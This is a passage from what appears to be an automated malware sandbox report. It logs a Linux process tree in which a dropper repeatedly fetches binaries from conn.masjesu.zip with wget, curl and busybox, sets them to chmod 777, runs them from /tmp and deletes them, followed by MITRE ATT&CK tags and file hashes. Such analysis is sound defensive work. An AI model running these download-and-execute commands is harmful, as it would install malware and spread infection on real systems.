/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz2⤵
- System Network Configuration Discovery
PID:954
-
-
/bin/chmodchmod 777 mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz2⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz./mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz2⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz2⤵PID:957
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT2⤵
- System Network Configuration Discovery
PID:958
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT2⤵
- System Network Configuration Discovery
PID:961
-
-
/bin/chmodchmod 777 fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT2⤵
- File and Directory Permissions Modification
PID:962
-
-
/tmp/fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT./fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT2⤵
- Executes dropped EXE
PID:963
-
-
/bin/rmrm fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT2⤵PID:964
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF2⤵PID:965
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:966
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF2⤵PID:968
-
-
/bin/chmodchmod 777 ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF2⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF./ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF2⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF2⤵PID:971
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z2⤵
- System Network Configuration Discovery
PID:972
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z2⤵
- System Network Configuration Discovery
PID:975
-
-
/bin/chmodchmod 777 1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z2⤵
- File and Directory Permissions Modification
PID:976
-
-
/tmp/1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z./1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z2⤵
- Executes dropped EXE
PID:977
-
-
/bin/rmrm 1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z2⤵PID:978
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG2⤵PID:979
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:980
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG2⤵
- System Network Configuration Discovery
PID:982
-
-
/bin/chmodchmod 777 NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG2⤵
- File and Directory Permissions Modification
PID:983
-
-
/tmp/NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG./NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG2⤵
- Executes dropped EXE
PID:984
-
-
/bin/rmrm NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG2⤵PID:985
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS2⤵
- System Network Configuration Discovery
PID:986
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:987
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS2⤵
- System Network Configuration Discovery
PID:989
-
-
/bin/chmodchmod 777 ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS2⤵
- File and Directory Permissions Modification
PID:990
-
-
/tmp/ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS./ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS2⤵
- Executes dropped EXE
PID:991
-
-
/bin/rmrm ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS2⤵PID:992
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU92⤵
- System Network Configuration Discovery
PID:993
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU92⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:994
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU92⤵
- System Network Configuration Discovery
PID:996
-
-
/bin/chmodchmod 777 Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU92⤵
- File and Directory Permissions Modification
PID:997
-
-
/tmp/Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU9./Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU92⤵
- Executes dropped EXE
PID:998
-
-
/bin/rmrm Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU92⤵PID:999
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V2⤵
- System Network Configuration Discovery
PID:1000
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1001
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V2⤵
- System Network Configuration Discovery
PID:1003
-
-
/bin/chmodchmod 777 2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V2⤵
- File and Directory Permissions Modification
PID:1004
-
-
/tmp/2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V./2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V2⤵
- Executes dropped EXE
PID:1005
-
-
/bin/rmrm 2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V2⤵PID:1006
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd2⤵
- System Network Configuration Discovery
PID:1007
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1008
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd2⤵
- System Network Configuration Discovery
PID:1010
-
-
/bin/chmodchmod 777 gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd2⤵
- File and Directory Permissions Modification
PID:1011
-
-
/tmp/gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd./gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd2⤵
- Executes dropped EXE
PID:1012
-
-
/bin/rmrm gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd2⤵PID:1013
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo2⤵PID:1014
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1015
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo2⤵
- System Network Configuration Discovery
PID:1017
-
-
/bin/chmodchmod 777 QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo2⤵
- File and Directory Permissions Modification
PID:1018
-
-
/tmp/QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo./QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo2⤵
- Executes dropped EXE
PID:1019
-
-
/bin/rmrm QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo2⤵PID:1020
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97